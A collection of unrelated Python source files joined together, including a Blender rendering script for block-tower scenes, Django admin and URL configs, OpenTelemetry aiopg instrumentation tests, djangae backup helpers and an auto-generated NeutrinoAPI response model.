ob.hide_render = True
def set_block(self, block):
"""
Initializes blocks described in the block.
"""
if block['id'] == 0:
self.set_base(block['data'])
else:
self.create_block(block)
def load_scene(self, scene_dict):
# with open(scenefl, 'rU') as fl:
if isinstance(scene_dict, str):
scene_dict = json.loads(scene_dict)
for block in scene_dict:
self.set_block(block)
def set_rendering_params(self, resolution):
"""
Configures various settings for rendering such as resolution.
"""
bpy.context.scene.render.fps = 60
bpy.context.scene.render.resolution_x = resolution[0]
bpy.context.scene.render.resolution_y = resolution[1]
bpy.context.scene.render.resolution_percentage = 100
bpy.context.scene.cycles.samples = 500
bpy.context.scene.render.tile_x = 24
bpy.context.scene.render.tile_y = 24
bpy.context.scene.render.engine = 'CYCLES'
def set_camera(self, rot):
"""
Moves the camera along a circular path.
Arguments:
rot (float): angle in degrees along path (0, 360).
"""
radius = 13.0
theta = np.pi * (rot / 180.0)
# Move camera to position on ring
xyz = [np.cos(theta) * radius, np.sin(theta) * radius, 1]
camera = bpy.data.objects['Camera']
camera.location = xyz
bpy.context.scene.update()
# Face camera towards point
loc_camera = camera.matrix_world.to_translation()
direction = mathutils.Vector([0,0,3]) - loc_camera
# point the camera's '-Z' axis at the target and use its 'Y' as up
rot_quat = direction.to_track_quat('-Z', 'Y')
self.rotate_obj(camera, rot_quat)
def frame_set(self, frame):
bpy.context.scene.frame_set(frame)
positions = np.array(self.trace['position'][frame])
rotations = np.array(self.trace['rotation'][frame])
n_blocks = positions.shape[0]
for block_i in range(n_blocks):
block = bpy.data.objects['{}'.format(block_i + 1)]
self.move_obj(block, positions[block_i])
self.rotate_obj(block, rotations[block_i])
block.keyframe_insert(data_path='location', index = -1)
block.keyframe_insert(data_path='rotation_quaternion', index = -1)
bpy.context.scene.update()
def render(self, output_name, frames, show = [],
resolution = (256, 256), camera_rot = None):
"""
output_name: Path to save frames
frames: a list of frames to render (shifted by warmup)
show: a list of object names to render
"""
if not os.path.isdir(output_name):
os.mkdir(output_name)
self.set_rendering_params(resolution)
if len(show) > 0:
for obj in bpy.context.scene.objects:
if not obj.name in show:
# print("Hiding {0!s}".format(o_name))
obj.cycles_visibility.diffuse = False
obj.hide = True
obj.hide_render = True
if camera_rot is None:
camera_rot = np.zeros(len(frames))
for i, (frame, cam) in enumerate(zip(frames, camera_rot)):
out = os.path.join(output_name, '{0:d}'.format(i))
if os.path.isfile(out + '.png'):
print('Frame {} already rendered'.format(frame))
continue
bpy.context.scene.render.filepath = out
self.set_camera(cam)
self.frame_set(frame)
bpy.ops.render.render(write_still=True)
def render_circle(self, out_path, freeze = True, dur = 1,
resolution = (256, 256)):
"""
Renders a ring around a tower.
Arguments:
out_path (str): Path to save frames.
freeze (bool): Whether or not to run physics.
dur (float, optional): Duration in seconds.
resolution (float, optional): Resolution of render.
"""
self.set_rendering_params(resolution)
n = int(dur * bpy.context.scene.render.fps)
rots = np.linspace(0, 360, n)
if freeze == True:
frames = np.zeros(n).astype(int)
else:
frames = np.arange(n)
self.render(out_path, frames, resolution = resolution,
camera_rot = rots)
def save(self, out):
"""
Writes the scene as a blend file.
"""
bpy.ops.wm.save_as_mainfile(filepath=out)
# From https://stackoverflow.com/questions/11130156/suppress-stdout-stderr-print-from-python-functions
class Suppressor(object):
'''
A context manager for doing a "deep suppression" of stdout and stderr in
Python, i.e. will suppress all print, even if the print originates in a
compiled C/Fortran sub-function.
This will not suppress raised exceptions, since exceptions are printed
to stderr just before a script exits, and after the context manager has
exited (at least, I think that is why it lets exceptions through).
'''
def __init__(self):
# Open a pair of null files
self.null_fds = [os.open(os.devnull,os.O_RDWR) for x in range(2)]
# Save the actual stdout (1) and stderr (2) file descriptors.
self.save_fds = [os.dup(1), os.dup(2)]
def __enter__(self):
# Assign the null pointers to stdout and stderr.
os.dup2(self.null_fds[0],1)
os.dup2(self.null_fds[1],2)
def __exit__(self, *_):
# Re-assign the real stdout/stderr back to (1) and (2)
os.dup2(self.save_fds[0],1)
os.dup2(self.save_fds[1],2)
# Close all file descriptors
for fd in self.null_fds + self.save_fds:
os.close(fd)
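# Usage sketch (added note): Suppressor is a plain context manager, so noisy
# calls can be silenced with e.g.
#   with Suppressor():
#       bpy.ops.wm.open_mainfile(filepath=materials_path)
# which mirrors how BlockScene.__init__ uses it above.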
def parser(args):
p = argparse.ArgumentParser(description = 'Renders blockworld scene')
p.add_argument('--scene', type = json.loads,
help = 'Tower json describing the scene.')
p.add_argument('--trace', type = json.loads,
help = 'Trace json for physics.')
p.add_argument('--out', type = str,
help = 'Path to save rendering')
p.add_argument('--wireframe', action = 'store_true',
help = 'Render objects as wireframes')
p.add_argument('--save_world', action = 'store_true',
help = 'Save the resulting blend scene')
p.add_argument('--render_mode', type = str, default = 'default',
choices = ['default', 'motion', 'frozen', 'none'],
help = 'mode to render')
p.add_argument('--resolution', type = int, nargs = 2,
default = (256,256), help = 'Render resolution')
return p.parse_args(args)
def main():
argv = sys.argv
print(argv[:6])
if '--' in sys.argv:
argv = sys.argv[sys.argv.index('--') + 1:]
args = parser(argv)
scene = BlockScene(args.scene, args.trace, wire_frame = args.wireframe)
path = os.path.join(args.out, 'render')
if not os.path.isdir(path):
os.mkdir(path)
frozen_path = os.path.join(path, 'frozen')
motion_path = os.path.join(path, 'motion')
n_frames = len(args.trace['position'])
if args.render_mode == 'default' or args.render_mode == 'frozen':
scene.render_circle(frozen_path, freeze = True, dur = 2,
resolution = args.resolution)
if args.render_mode == 'default' or args.render_mode == 'motion':
scene.render(motion_path, np.arange(n_frames),
resolution = args.resolution)
if args.render_mode == 'none':
for frame in range(n_frames):
scene.frame_set(frame)
if args.save_world:
path = os.path.join(args.out, 'world.blend')
scene.save(path)
if __name__ == '__main__':
main()
|
from ..Block import Block
class LoadSegBlock(Block):
def __init__(self, blkdev, blk_num=0):
Block.__init__(self, blkdev, blk_num, chk_loc=2, is_type=Block.LSEG)
def create(self, host_id=0, next=Block.no_blk, size=128):
Block.create(self)
self.size = size
self.host_id = host_id
self.next = next
def write(self):
if self.data == None:
self._create_data()
self._put_long(1, self.size)
self._put_long(3, self.host_id)
self._put_long(4, self.next)
Block.write(self)
def set_data(self, data):
if self.data == None:
self._create_data()
self.data[20:20+len(data)] = data
self.size = (20 + len(data)) / 4
def get_data(self):
return self.data[20:20+(self.size-5)*4]
def read(self):
Block.read(self)
if not self.valid:
return False
self.size = self._get_long(1)
self.host_id = self._get_long(3)
self.next = self._get_long(4)
return self.valid
def dump(self):
Block.dump(self, "RDBlock")
print " size: %d" % self.size
print " host_id: %d" % self.host_id
print " next: %s" % self._dump_ptr(self.next)
|
import pytest
import StocksMA.StocksMA as stm
@pytest.mark.parametrize(
"company",
[
"CIH",
"maroc telecom",
"involys",
"total",
"telecom",
"label",
"central",
"sothema",
"MNG",
"salaf",
"CIH",
"Auto Nejma",
],
)
def test_get_isin_company(company) -> None:
obj = stm.get_isin(company)
assert len(obj[1]) != 0
assert isinstance(obj, tuple)
@pytest.mark.parametrize(
"not_company",
[
"",
"123",
"aaaaa",
"bank",
"maroc",
"agricol",
"centrale",
],
)
@pytest.mark.xfail(raises=Exception)
def test_get_isin_not_company(not_company) -> None:
stm.get_isin(not_company)
def test_get_market_status() -> None:
stat = stm.get_market_status()
assert isinstance(stat, str)
|
from django.contrib import admin
from django.utils import timezone
# Register your models here.
from smarttm_web.models import Participation_Type, Position, User, Club, Participation, Member, EC_Member, Meeting, Evaluation, Attendance
class PositionAdmin(admin.ModelAdmin):
list_display = ('name', 'seniority')
class UserAdmin(admin.ModelAdmin):
list_display = ('email', 'full_name', 'is_staff', 'is_admin', 'last_login', 'get_groups')
class ParticipationTypeAdmin(admin.ModelAdmin):
list_display = ('name', 'category')
class MemberAdmin(admin.ModelAdmin):
list_display = ('user', 'club', 'paid_status', 'active', 'is_EC')
class ParticipationAdmin(admin.ModelAdmin):
list_display = ('member', 'club', 'participation_type', 'meeting')
admin.site.register(Participation_Type, ParticipationTypeAdmin)
admin.site.register(User, UserAdmin)
admin.site.register(Position, PositionAdmin)
admin.site.register(Club)
admin.site.register(Participation, ParticipationAdmin)
admin.site.register(Member, MemberAdmin)
admin.site.register(EC_Member)
admin.site.register(Meeting)
admin.site.register(Attendance)
admin.site.register(Evaluation)
|
import numpy as np
import pytest
from sklego.common import flatten
from sklego.linear_model import LowessRegression
from tests.conftest import nonmeta_checks, regressor_checks, general_checks
@pytest.mark.parametrize(
"test_fn", flatten([nonmeta_checks, general_checks, regressor_checks])
)
def test_estimator_checks(test_fn):
lowess = LowessRegression()
test_fn(LowessRegression.__name__, lowess)
def test_obvious_usecase():
x = np.linspace(0, 10, 100)
X = x.reshape(-1, 1)
y = np.ones(x.shape)
y_pred = LowessRegression().fit(X, y).predict(X)
assert np.isclose(y, y_pred).all() |
# Copyright The OpenTelemetry Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import asyncio
import logging
from unittest import mock
from unittest.mock import MagicMock
import aiopg
from aiopg.utils import _ContextManager, _PoolAcquireContextManager
import opentelemetry.instrumentation.aiopg
from opentelemetry import trace as trace_api
from opentelemetry.instrumentation.aiopg import AiopgInstrumentor, wrappers
from opentelemetry.instrumentation.aiopg.aiopg_integration import (
AiopgIntegration,
)
from opentelemetry.sdk import resources
from opentelemetry.test.test_base import TestBase
def async_call(coro):
loop = asyncio.get_event_loop()
return loop.run_until_complete(coro)
class TestAiopgInstrumentor(TestBase):
def setUp(self):
super().setUp()
self.origin_aiopg_connect = aiopg.connect
self.origin_aiopg_create_pool = aiopg.create_pool
aiopg.connect = mock_connect
aiopg.create_pool = mock_create_pool
def tearDown(self):
super().tearDown()
aiopg.connect = self.origin_aiopg_connect
aiopg.create_pool = self.origin_aiopg_create_pool
with self.disable_logging():
AiopgInstrumentor().uninstrument()
def test_instrumentor_connect(self):
AiopgInstrumentor().instrument()
cnx = async_call(aiopg.connect(database="test"))
cursor = async_call(cnx.cursor())
query = "SELECT * FROM test"
async_call(cursor.execute(query))
spans_list = self.memory_exporter.get_finished_spans()
self.assertEqual(len(spans_list), 1)
span = spans_list[0]
# Check version and name in span's instrumentation info
self.check_span_instrumentation_info(
span, opentelemetry.instrumentation.aiopg
)
# check that no spans are generated after uninstrument
AiopgInstrumentor().uninstrument()
cnx = async_call(aiopg.connect(database="test"))
cursor = async_call(cnx.cursor())
query = "SELECT * FROM test"
cursor.execute(query)
spans_list = self.memory_exporter.get_finished_spans()
self.assertEqual(len(spans_list), 1)
def test_instrumentor_create_pool(self):
AiopgInstrumentor().instrument()
pool = async_call(aiopg.create_pool(database="test"))
cnx = async_call(pool.acquire())
cursor = async_call(cnx.cursor())
query = "SELECT * FROM test"
async_call(cursor.execute(query))
spans_list = self.memory_exporter.get_finished_spans()
self.assertEqual(len(spans_list), 1)
span = spans_list[0]
# Check version and name in span's instrumentation info
self.check_span_instrumentation_info(
span, opentelemetry.instrumentation.aiopg
)
# check that no spans are generated after uninstrument
AiopgInstrumentor().uninstrument()
pool = async_call(aiopg.create_pool(database="test"))
cnx = async_call(pool.acquire())
cursor = async_call(cnx.cursor())
query = "SELECT * FROM test"
cursor.execute(query)
spans_list = self.memory_exporter.get_finished_spans()
self.assertEqual(len(spans_list), 1)
def test_custom_tracer_provider_connect(self):
resource = resources.Resource.create({})
result = self.create_tracer_provider(resource=resource)
tracer_provider, exporter = result
AiopgInstrumentor().instrument(tracer_provider=tracer_provider)
cnx = async_call(aiopg.connect(database="test"))
cursor = async_call(cnx.cursor())
query = "SELECT * FROM test"
async_call(cursor.execute(query))
spans_list = exporter.get_finished_spans()
self.assertEqual(len(spans_list), 1)
span = spans_list[0]
self.assertIs(span.resource, resource)
def test_custom_tracer_provider_create_pool(self):
resource = resources.Resource.create({})
result = self.create_tracer_provider(resource=resource)
tracer_provider, exporter = result
AiopgInstrumentor().instrument(tracer_provider=tracer_provider)
pool = async_call(aiopg.create_pool(database="test"))
cnx = async_call(pool.acquire())
cursor = async_call(cnx.cursor())
query = "SELECT * FROM test"
async_call(cursor.execute(query))
spans_list = exporter.get_finished_spans()
self.assertEqual(len(spans_list), 1)
span = spans_list[0]
self.assertIs(span.resource, resource)
def test_instrument_connection(self):
cnx = async_call(aiopg.connect(database="test"))
query = "SELECT * FROM test"
cursor = async_call(cnx.cursor())
async_call(cursor.execute(query))
spans_list = self.memory_exporter.get_finished_spans()
self.assertEqual(len(spans_list), 0)
cnx = AiopgInstrumentor().instrument_connection(cnx)
cursor = async_call(cnx.cursor())
async_call(cursor.execute(query))
spans_list = self.memory_exporter.get_finished_spans()
self.assertEqual(len(spans_list), 1)
def test_uninstrument_connection(self):
AiopgInstrumentor().instrument()
cnx = async_call(aiopg.connect(database="test"))
query = "SELECT * FROM test"
cursor = async_call(cnx.cursor())
async_call(cursor.execute(query))
spans_list = self.memory_exporter.get_finished_spans()
self.assertEqual(len(spans_list), 1)
cnx = AiopgInstrumentor().uninstrument_connection(cnx)
cursor = async_call(cnx.cursor())
async_call(cursor.execute(query))
spans_list = self.memory_exporter.get_finished_spans()
self.assertEqual(len(spans_list), 1)
class TestAiopgIntegration(TestBase):
def setUp(self):
super().setUp()
self.tracer = self.tracer_provider.get_tracer(__name__)
def test_span_succeeded(self):
connection_props = {
"database": "testdatabase",
"server_host": "testhost",
"server_port": 123,
"user": "testuser",
}
connection_attributes = {
"database": "database",
"port": "server_port",
"host": "server_host",
"user": "user",
}
db_integration = AiopgIntegration(
self.tracer, "testcomponent", "testtype", connection_attributes
)
mock_connection = async_call(
db_integration.wrapped_connection(
mock_connect, {}, connection_props
)
)
cursor = async_call(mock_connection.cursor())
async_call(cursor.execute("Test query", ("param1Value", False)))
spans_list = self.memory_exporter.get_finished_spans()
self.assertEqual(len(spans_list), 1)
span = spans_list[0]
self.assertEqual(span.name, "testcomponent.testdatabase")
self.assertIs(span.kind, trace_api.SpanKind.CLIENT)
self.assertEqual(span.attributes["component"], "testcomponent")
self.assertEqual(span.attributes["db.type"], "testtype")
self.assertEqual(span.attributes["db.instance"], "testdatabase")
self.assertEqual(span.attributes["db.statement"], "Test query")
self.assertEqual(
span.attributes["db.statement.parameters"],
"('param1Value', False)",
)
self.assertEqual(span.attributes["db.user"], "testuser")
self.assertEqual(span.attributes["net.peer.name"], "testhost")
self.assertEqual(span.attributes["net.peer.port"], 123)
self.assertIs(
span.status.canonical_code,
trace_api.status.StatusCanonicalCode.OK,
)
def test_span_not_recording(self):
connection_props = {
"database": "testdatabase",
"server_host": "testhost",
"server_port": 123,
"user": "testuser",
}
connection_attributes = {
"database": "database",
"port": "server_port",
"host": "server_host",
"user": "user",
}
mock_tracer = mock.Mock()
mock_span = mock.Mock()
mock_span.is_recording.return_value = False
mock_tracer.start_span.return_value = mock_span
mock_tracer.use_span.return_value.__enter__ = mock_span
mock_tracer.use_span.return_value.__exit__ = True
db_integration = AiopgIntegration(
mock_tracer, "testcomponent", "testtype", connection_attributes
)
mock_connection = async_call(
db_integration.wrapped_connection(
mock_connect, {}, connection_props
)
)
cursor = async_call(mock_connection.cursor())
async_call(cursor.execute("Test query", ("param1Value", False)))
self.assertFalse(mock_span.is_recording())
self.assertTrue(mock_span.is_recording.called)
self.assertFalse(mock_span.set_attribute.called)
self.assertFalse(mock_span.set_status.called)
def test_span_failed(self):
db_integration = AiopgIntegration(self.tracer, "testcomponent")
mock_connection = async_call(
db_integration.wrapped_connection(mock_connect, {}, {})
)
cursor = async_call(mock_connection.cursor())
with self.assertRaises(Exception):
async_call(cursor.execute("Test query", throw_exception=True))
spans_list = self.memory_exporter.get_finished_spans()
self.assertEqual(len(spans_list), 1)
span = spans_list[0]
self.assertEqual(span.attributes["db.statement"], "Test query")
self.assertIs(
span.status.canonical_code,
trace_api.status.StatusCanonicalCode.UNKNOWN,
)
self.assertEqual(span.status.description, "Test Exception")
def test_executemany(self):
db_integration = AiopgIntegration(self.tracer, "testcomponent")
mock_connection = async_call(
db_integration.wrapped_connection(mock_connect, {}, {})
)
cursor = async_call(mock_connection.cursor())
async_call(cursor.executemany("Test query"))
spans_list = self.memory_exporter.get_finished_spans()
self.assertEqual(len(spans_list), 1)
span = spans_list[0]
self.assertEqual(span.attributes["db.statement"], "Test query")
def test_callproc(self):
db_integration = AiopgIntegration(self.tracer, "testcomponent")
mock_connection = async_call(
db_integration.wrapped_connection(mock_connect, {}, {})
)
cursor = async_call(mock_connection.cursor())
async_call(cursor.callproc("Test stored procedure"))
spans_list = self.memory_exporter.get_finished_spans()
self.assertEqual(len(spans_list), 1)
span = spans_list[0]
self.assertEqual(
span.attributes["db.statement"], "Test stored procedure"
)
def test_wrap_connect(self):
aiopg_mock = AiopgMock()
with mock.patch("aiopg.connect", aiopg_mock.connect):
wrappers.wrap_connect(self.tracer, "-")
connection = async_call(aiopg.connect())
self.assertEqual(aiopg_mock.connect_call_count, 1)
self.assertIsInstance(connection.__wrapped__, mock.Mock)
def test_unwrap_connect(self):
wrappers.wrap_connect(self.tracer, "-")
aiopg_mock = AiopgMock()
with mock.patch("aiopg.connect", aiopg_mock.connect):
connection = async_call(aiopg.connect())
self.assertEqual(aiopg_mock.connect_call_count, 1)
wrappers.unwrap_connect()
connection = async_call(aiopg.connect())
self.assertEqual(aiopg_mock.connect_call_count, 2)
self.assertIsInstance(connection, mock.Mock)
def test_wrap_create_pool(self):
async def check_connection(pool):
async with pool.acquire() as connection:
self.assertEqual(aiopg_mock.create_pool_call_count, 1)
self.assertIsInstance(
connection.__wrapped__, AiopgConnectionMock
)
aiopg_mock = AiopgMock()
with mock.patch("aiopg.create_pool", aiopg_mock.create_pool):
wrappers.wrap_create_pool(self.tracer, "-")
pool = async_call(aiopg.create_pool())
async_call(check_connection(pool))
def test_unwrap_create_pool(self):
async def check_connection(pool):
async with pool.acquire() as connection:
self.assertEqual(aiopg_mock.create_pool_call_count, 2)
self.assertIsInstance(connection, AiopgConnectionMock)
aiopg_mock = AiopgMock()
with mock.patch("aiopg.create_pool", aiopg_mock.create_pool):
wrappers.wrap_create_pool(self.tracer, "-")
pool = async_call(aiopg.create_pool())
self.assertEqual(aiopg_mock.create_pool_call_count, 1)
wrappers.unwrap_create_pool()
pool = async_call(aiopg.create_pool())
async_call(check_connection(pool))
def test_instrument_connection(self):
connection = mock.Mock()
# Avoid get_attributes failing because can't concatenate mock
connection.database = "-"
connection2 = wrappers.instrument_connection(
self.tracer, connection, "-"
)
self.assertIs(connection2.__wrapped__, connection)
def test_uninstrument_connection(self):
connection = mock.Mock()
# Set connection.database to avoid a failure because mock can't
# be concatenated
connection.database = "-"
connection2 = wrappers.instrument_connection(
self.tracer, connection, "-"
)
self.assertIs(connection2.__wrapped__, connection)
connection3 = wrappers.uninstrument_connection(connection2)
self.assertIs(connection3, connection)
with self.assertLogs(level=logging.WARNING):
connection4 = wrappers.uninstrument_connection(connection)
self.assertIs(connection4, connection)
# pylint: disable=unused-argument
async def mock_connect(*args, **kwargs):
database = kwargs.get("database")
server_host = kwargs.get("server_host")
server_port = kwargs.get("server_port")
user = kwargs.get("user")
return MockConnection(database, server_port, server_host, user)
# pylint: disable=unused-argument
async def mock_create_pool(*args, **kwargs):
database = kwargs.get("database")
server_host = kwargs.get("server_host")
server_port = kwargs.get("server_port")
user = kwargs.get("user")
return MockPool(database, server_port, server_host, user)
class MockPool:
def __init__(self, database, server_port, server_host, user):
self.database = database
self.server_port = server_port
self.server_host = server_host
self.user = user
async def release(self, conn):
return conn
def acquire(self):
"""Acquire free connection from the pool."""
coro = self._acquire()
return _PoolAcquireContextManager(coro, self)
async def _acquire(self):
connect = await mock_connect(
self.database, self.server_port, self.server_host, self.user
)
return connect
class MockPsycopg2Connection:
def __init__(self, database, server_port, server_host, user):
self.database = database
self.server_port = server_port
self.server_host = server_host
self.user = user
class MockConnection:
def __init__(self, database, server_port, server_host, user):
self._conn = MockPsycopg2Connection(
database, server_port, server_host, user
)
# pylint: disable=no-self-use
def cursor(self):
coro = self._cursor()
return _ContextManager(coro)
async def _cursor(self):
return MockCursor()
def close(self):
pass
class MockCursor:
# pylint: disable=unused-argument, no-self-use
async def execute(self, query, params=None, throw_exception=False):
if throw_exception:
raise Exception("Test Exception")
# pylint: disable=unused-argument, no-self-use
async def executemany(self, query, params=None, throw_exception=False):
if throw_exception:
raise Exception("Test Exception")
# pylint: disable=unused-argument, no-self-use
async def callproc(self, query, params=None, throw_exception=False):
if throw_exception:
raise Exception("Test Exception")
class AiopgConnectionMock:
_conn = MagicMock()
async def __aexit__(self, exc_type, exc_val, exc_tb):
pass
async def __aenter__(self):
return MagicMock()
class AiopgPoolMock:
async def release(self, conn):
return conn
def acquire(self):
coro = self._acquire()
return _PoolAcquireContextManager(coro, self)
async def _acquire(self):
return AiopgConnectionMock()
class AiopgMock:
def __init__(self):
self.connect_call_count = 0
self.create_pool_call_count = 0
async def connect(self, *args, **kwargs):
self.connect_call_count += 1
return MagicMock()
async def create_pool(self, *args, **kwargs):
self.create_pool_call_count += 1
return AiopgPoolMock()
|
import datetime
from django.conf import settings
from google.appengine.api import app_identity
SETTINGS_PREFIX = "DJANGAE_BACKUP_"
def get_backup_setting(name, required=True, default=None):
settings_name = "{}{}".format(SETTINGS_PREFIX, name)
if required and not hasattr(settings, settings_name):
raise Exception("{} is required".format(settings_name))
return getattr(settings, settings_name, default)
def get_gcs_bucket():
"""Get a bucket from DJANGAE_BACKUP_GCS_BUCKET setting. Defaults to the
default application bucket with 'djangae-backups' appended.
Raises an exception if DJANGAE_BACKUP_GCS_BUCKET is missing and there is
no default bucket.
"""
try:
bucket = settings.DJANGAE_BACKUP_GCS_BUCKET
except AttributeError:
bucket = app_identity.get_default_gcs_bucket_name()
if bucket:
bucket = '{}/djangae-backups'.format(bucket)
if not bucket:
raise Exception('No DJANGAE_BACKUP_GCS_BUCKET or default bucket')
return bucket
def get_backup_path():
bucket = get_gcs_bucket()
# And then we create a new, time-stamped directory for every backup run.
# This will give us UTC even if USE_TZ=False and we aren't running on
# App Engine (local development?).
dt = datetime.datetime.utcnow()
bucket_path = '{}/{:%Y%m%d-%H%M%S}'.format(bucket, dt)
return bucket_path
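# A minimal usage sketch (the setting names and values below are illustrative;
# only the DJANGAE_BACKUP_ prefix and GCS_BUCKET come from this module):
#
#   # settings.py
#   DJANGAE_BACKUP_GCS_BUCKET = 'my-app-bucket/backups'
#
#   # elsewhere
#   enabled = get_backup_setting('ENABLED', required=False, default=False)
#   path = get_backup_path()  # e.g. 'my-app-bucket/backups/20200101-120000'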
|
from libfuturize.fixes.fix_future_standard_library import FixFutureStandardLibrary
|
from django.db import models
class DropBoxListener(models.Model):
listen = models.IntegerField()
|
from django.conf.urls import url
from . import views
from django.conf import settings
from django.conf.urls.static import static
urlpatterns = [
    url(r'^$', views.index, name='index'),
    url(r'^search/', views.search_photos, name='searchPhotos'),
    url(r'^location/', views.search_location, name='locationPhoto')
]
if settings.DEBUG:
    urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT) |
def separar(lst):
if lst == []:
return [], []
a, b = lst[0]
la, lb = separar(lst[1:])
return [a]+la, [b]+lb
def remove_e_conta(lst, element):
if lst == []:
return [], 0
lst1, count = remove_e_conta(lst[1:], element)
if lst[0] == element:
return lst1, count + 1
else:
return [lst[0]] + lst1, count
def count_elements(lst, final=()):
    # Completed recursively: pairs each distinct element with its occurrence count.
    if lst == []:
        return final
    rest, count = remove_e_conta(lst[1:], lst[0])
    return count_elements(rest, final + ((lst[0], count + 1),))
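# Example with the completion above: count_elements([1, 6, 2, 5, 5, 2, 5, 2])
# returns ((1, 1), (6, 1), (2, 3), (5, 3)), i.e. each distinct element paired
# with how many times it occurs, in order of first appearance.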
if __name__ == "__main__":
lst = [(1,4), (2,3), (3,2), (4,1)]
print(f"separa: {separar(lst)}")
print(f"remove e conta: {remove_e_conta([1, 6, 2, 5, 5, 2, 5, 2], 2)}")
print(f"") |
"""
Pylibui test suite.
"""
from pylibui.controls import ProgressBar
from tests.utils import WindowTestCase
class ProgressBarTest(WindowTestCase):
def setUp(self):
super().setUp()
self.progressbar = ProgressBar()
def test_value_initial_value(self):
"""Tests the progressbar's `value` initial value is zero."""
self.assertEqual(self.progressbar.value, 0)
def test_value_can_be_changed(self):
"""Tests the progressbar's `value` attribute can be changed."""
value = 30
self.progressbar.value = value
self.assertEqual(self.progressbar.value, value)
# TODO: should we check for variable type to avoid app crashes ?
# NOTE: weirdly enough, the sliders don't crash like this; this may
# be a bug in libui.
# with self.assertRaises(ValueError):
# self.progressbar.set_value('hello')
|
# -*- coding: utf-8 -*-
"""
neutrino_api
This file was automatically generated for NeutrinoAPI by APIMATIC v2.0 ( https://apimatic.io ).
"""
class URLInfoResponse(object):
"""Implementation of the 'URL Info Response' model.
TODO: type model description here.
Attributes:
        http_status_message (int): The HTTP status message associated with the
            status code
        server_region (string): The server's IP geo-location: full region name
            (if detectable)
        query (dict<object, string>): A key-value map of the URL query
            parameters
server_name (string): The name of the server software hosting this
URL
url_port (int): The URL port
        server_country (string): The server's IP geo-location: full country
name
real (bool): Is this URL actually serving real content
        server_city (string): The server's IP geo-location: full city name (if
detectable)
url_path (string): The URL path
url (string): The fully qualified URL. This may be different to the
URL requested if http-redirect is true
valid (bool): Is this a valid well-formed URL
        server_hostname (string): The server's hostname (PTR record)
load_time (int): The time taken to load the URL content in seconds
http_ok (bool): True if this URL responded with an HTTP OK (200)
status
content_size (int): The size of the URL content in bytes
http_status (int): The HTTP status code this URL responded with. An
HTTP status of 0 indicates a network level issue
        server_country_code (string): The server's IP geo-location: ISO
2-letter country code
content_encoding (string): The encoding format the URL uses
server_ip (string): The IP address of the server hosting this URL
url_protocol (string): The URL protocol, usually http or https
content_type (string): The content-type this URL serves
http_redirect (bool): True if this URL responded with an HTTP
redirect
content (string): The actual content this URL responded with. Only set
if the 'fetch-content' option was used
is_timeout (bool): True if a timeout occurred while loading the URL.
You can set the timeout with the request parameter 'timeout'
"""
# Create a mapping from Model property names to API property names
_names = {
"http_status_message":'httpStatusMessage',
"server_region":'serverRegion',
"query":'query',
"server_name":'serverName',
"url_port":'urlPort',
"server_country":'serverCountry',
"real":'real',
"server_city":'serverCity',
"url_path":'urlPath',
"url":'url',
"valid":'valid',
"server_hostname":'serverHostname',
"load_time":'loadTime',
"http_ok":'httpOk',
"content_size":'contentSize',
"http_status":'httpStatus',
"server_country_code":'serverCountryCode',
"content_encoding":'contentEncoding',
"server_ip":'serverIp',
"url_protocol":'urlProtocol',
"content_type":'contentType',
"http_redirect":'httpRedirect',
"content":'content',
"is_timeout":'isTimeout'
}
def __init__(self,
http_status_message=None,
server_region=None,
query=None,
server_name=None,
url_port=None,
server_country=None,
real=None,
server_city=None,
url_path=None,
url=None,
valid=None,
server_hostname=None,
load_time=None,
http_ok=None,
content_size=None,
http_status=None,
server_country_code=None,
content_encoding=None,
server_ip=None,
url_protocol=None,
content_type=None,
http_redirect=None,
content=None,
is_timeout=None):
"""Constructor for the URLInfoResponse class"""
# Initialize members of the class
self.http_status_message = http_status_message
self.server_region = server_region
self.query = query
self.server_name = server_name
self.url_port = url_port
self.server_country = server_country
self.real = real
self.server_city = server_city
self.url_path = url_path
self.url = url
self.valid = valid
self.server_hostname = server_hostname
self.load_time = load_time
self.http_ok = http_ok
self.content_size = content_size
self.http_status = http_status
self.server_country_code = server_country_code
self.content_encoding = content_encoding
self.server_ip = server_ip
self.url_protocol = url_protocol
self.content_type = content_type
self.http_redirect = http_redirect
self.content = content
self.is_timeout = is_timeout
@classmethod
def from_dictionary(cls,
dictionary):
"""Creates an instance of this model from a dictionary
Args:
dictionary (dictionary): A dictionary representation of the object as
obtained from the deserialization of the server's response. The keys
MUST match property names in the API description.
Returns:
object: An instance of this structure class.
"""
if dictionary is None:
return None
# Extract variables from the dictionary
http_status_message = dictionary.get('httpStatusMessage')
server_region = dictionary.get('serverRegion')
query = dictionary.get('query')
server_name = dictionary.get('serverName')
url_port = dictionary.get('urlPort')
server_country = dictionary.get('serverCountry')
real = dictionary.get('real')
server_city = dictionary.get('serverCity')
url_path = dictionary.get('urlPath')
url = dictionary.get('url')
valid = dictionary.get('valid')
server_hostname = dictionary.get('serverHostname')
load_time = dictionary.get('loadTime')
http_ok = dictionary.get('httpOk')
content_size = dictionary.get('contentSize')
http_status = dictionary.get('httpStatus')
server_country_code = dictionary.get('serverCountryCode')
content_encoding = dictionary.get('contentEncoding')
server_ip = dictionary.get('serverIp')
url_protocol = dictionary.get('urlProtocol')
content_type = dictionary.get('contentType')
http_redirect = dictionary.get('httpRedirect')
content = dictionary.get('content')
is_timeout = dictionary.get('isTimeout')
# Return an object of this model
return cls(http_status_message,
server_region,
query,
server_name,
url_port,
server_country,
real,
server_city,
url_path,
url,
valid,
server_hostname,
load_time,
http_ok,
content_size,
http_status,
server_country_code,
content_encoding,
server_ip,
url_protocol,
content_type,
http_redirect,
content,
is_timeout)
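# A minimal usage sketch (the response dictionary below is illustrative rather
# than output from a real API call):
#
#   payload = {'url': 'https://example.com', 'httpStatus': 200, 'httpOk': True}
#   info = URLInfoResponse.from_dictionary(payload)
#   print(info.url, info.http_status, info.http_ok)  # https://example.com 200 True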
|
from monero_glue.xmr import crypto
from monero_glue.xmr.sub.keccak_hasher import HashWrapper
from monero_serialize import xmrserialize
class PreMlsagHasher(object):
"""
Iterative construction of the pre_mlsag_hash
"""
def __init__(self, state=None):
from monero_glue.xmr.sub.keccak_hasher import HashWrapper, KeccakXmrArchive
